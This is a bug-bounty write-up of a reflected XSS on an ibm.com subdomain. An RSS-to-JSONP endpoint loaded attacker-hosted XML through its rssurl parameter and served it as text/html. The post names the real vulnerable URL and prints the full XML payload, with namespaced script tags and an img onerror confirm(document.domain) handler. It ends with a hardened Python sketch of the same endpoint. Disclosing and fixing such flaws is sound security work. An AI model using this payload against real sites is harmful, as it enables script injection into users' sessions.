Khaled Nassar
Reflected XSS by jsonp on ibm.com subdomain

hi :D
This is my write-up of a bug I found on ibm.com. First I collected URLs for ibm.com from web.archive.org using the waybackurls tool, and among them was this URL: https://www-356.ibm.com/partnerworld/wps/servlet/pwdyn/pw/rss/rsstojson.jsp?ccdb=no&rssurl=https://www-2000.ibm.com/file.xml&_=1596170198353
This endpoint includes an XML file via the rssurl parameter and converts its content from XML to JSONP.

But the response headers say content-type: text/html, which lets HTML tags in the response execute in the page. So I created an XML file with an XSS payload, uploaded it to my website https://knassar702.github.io/xss.xml,
and put the link to that file in the rssurl parameter:

```xml
<html>
        <head></head>
        <body>
                <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
                <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
                <info>
                  <name>
                    <value><![CDATA[<img src=x onerror=confirm(document.domain)>]]></value>
                  </name>
                    <description>
                      <value>Hello</value>
                    </description>
                    <url>
                      <value>http://google.com</value>
                    </url>
                </info>
        </body>
</html>
```

Done :D
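The hardened counterpart, as an added example that is not from the post or from IBM's code: a Python sketch (the real endpoint is a JSP servlet) of the same XML-to-JSONP conversion that only fetches feeds from an allowlisted host (www-2000.ibm.com is assumed here as the legitimate feed origin), validates the callback name, and serves the result as application/javascript with nosniff and JSON-escaped angle brackets, so a feed carrying the payload above comes back as inert data. The sample feed is constructed.

```python
import json
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Assumed allowlist of feed origins (not IBM's real configuration).
ALLOWED_FEED_HOSTS = {"www-2000.ibm.com"}
# JSONP callback must be a plain identifier, never arbitrary script.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]{0,63}$")

# Constructed sample feed carrying the same kind of payload the write-up used.
SAMPLE_XML = b"""<rss><channel><item>
  <title><![CDATA[<img src=x onerror=confirm(document.domain)>]]></title>
  <link>http://example.com/post</link>
</item></channel></rss>"""


def feed_url_is_allowed(url: str) -> bool:
    """Fetch only https feeds from the allowlist: this closes the
    'point rssurl at my own server' step and the open-fetcher SSRF angle."""
    parts = urlparse(url)
    return parts.scheme == "https" and parts.hostname in ALLOWED_FEED_HOSTS


def rss_to_jsonp(xml_bytes: bytes, callback: str):
    """Return (headers, body) for a hardened JSONP rendering of the feed."""
    if not CALLBACK_RE.match(callback):
        raise ValueError("invalid callback name")
    root = ET.fromstring(xml_bytes)
    # CDATA content is returned as plain text by ElementTree; it is data here,
    # never interpolated as markup.
    items = [
        {"title": item.findtext("title") or "", "link": item.findtext("link") or ""}
        for item in root.iter("item")
    ]
    # json.dumps escapes quotes and control characters; escaping the angle
    # brackets as well keeps the body inert even for a client that sniffs it.
    payload = json.dumps({"items": items})
    payload = payload.replace("<", "\\u003c").replace(">", "\\u003e")
    body = f"/**/{callback}({payload});"
    headers = {
        # The original bug: text/html let the browser render the feed.
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, body
```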
